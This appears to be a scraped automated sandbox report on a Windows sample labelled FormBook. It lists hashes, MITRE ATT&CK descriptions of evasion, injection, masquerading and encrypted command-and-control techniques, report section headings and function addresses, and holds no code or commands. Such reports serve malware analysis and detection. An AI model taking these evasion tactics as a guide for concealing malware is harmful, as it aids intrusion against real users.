Opcode Fuzzy Hash: 190869c8322f4ccd2fe96d759da812d203b35b09ea892f48fb611c55b8746e26
Instruction Fuzzy Hash: D38139B1D00269DBDB35DF54CD44BEEB6B4AF48754F0051EAAA19B7250E730AE80CFA0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
1.exe

Function 02C8D558 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Function 02C8F764 Relevance: 1.6, APIs: 1, Instructions: 117
COMMON

Function 02C8C85C Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Function 02C874B8 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Function 02C874C0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Function 02C8C6E8 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Function 02C8D9D8 Relevance: 1.6, APIs: 1, Instructions: 52
libraryCOMMON

Function 02C8D758 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Function 00418260 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Function 00409B10 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 004181AB Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON